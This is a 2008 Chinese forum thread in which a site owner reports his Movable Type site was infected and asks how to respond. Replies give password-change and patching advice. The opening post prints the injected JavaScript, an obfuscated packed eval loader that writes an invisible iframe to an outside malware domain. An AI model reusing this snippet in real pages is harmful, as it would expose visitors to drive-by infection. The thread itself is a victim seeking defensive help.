TMD被挂马了，咋办？

dimlau · 发表于 2008-5-19 19:31:24

今天访问自己网站被MACfee提示有木马，检查页面JS发现，被插入了一段JS：

function ads(){var Then = new Date()
Then.setTime(Then.getTime() + 6*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){} else {document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.6(\'<1 4=0 3=0 2="7://8.d/c/b.9?a"></1>\');',14,14,'|iframe|src|width|height|document|writeln|http|mydeller|htm|feng|add_651435|page|cn'.split('|'),0,{}))
window.status=" ";}}ads();

现在已经赶紧去除了，不过，这是我的原因还是服务器被黑了？
应该采取什么措施？比如修改ftp密码，还有联系客服？

忧伤b小调 · 发表于 2008-5-19 19:32:55

先修改FTP帐号密码,网站后台管理员密码,

去程序的官方站上看看有没有补丁包.

dimlau · 发表于 2008-5-19 19:39:39

主帐号密码怎么改？

神猪 · 发表于 2008-5-19 19:49:42

一般情况下不会是 FTP密码泄露网站用的什么程序 ?

检查检查程序吧

dimlau · 发表于 2008-5-19 20:09:22

程序肯定没问题
movabletype啊，老牌程序了
而且代码被加载到一个比较偏僻的js文件里，这个文件不再程序控制范围内

神猪 · 发表于 2008-5-19 20:16:47

既然是挂马当然是越隐蔽越偏僻越好了

你既然坚信程序没问题就只有等了

dimlau · 发表于 2008-5-19 21:10:24

等啥？
我是说。。。是不是可能空间账号被破了？
因为最近空间访问速度一直就不稳定，担心是服务器被黑了呢

一路同行 · 发表于 2008-5-20 09:07:49

修改账号密码在：从LP官网登陆——》Change Password

神猪 · 发表于 2008-5-20 09:32:05

原帖由 dimlau 于 2008-5-19 09:10 PM 发表
等啥？
我是说。。。是不是可能空间账号被破了？
因为最近空间访问速度一直就不稳定，担心是服务器被黑了呢

那我哪知道其实你装上那个破马跟踪跟踪到底是哪个小子在挂马

收获肯定大啊

大漠孤狼 · 发表于 2008-5-20 10:47:13

最可能的是程序问题
次可能的是服务器问题
可以把问题反映给lunarpages帮你检查下看看

例如你上面还有没有其他程序 mt是不是最新版还有没有别人和你共用帐户等等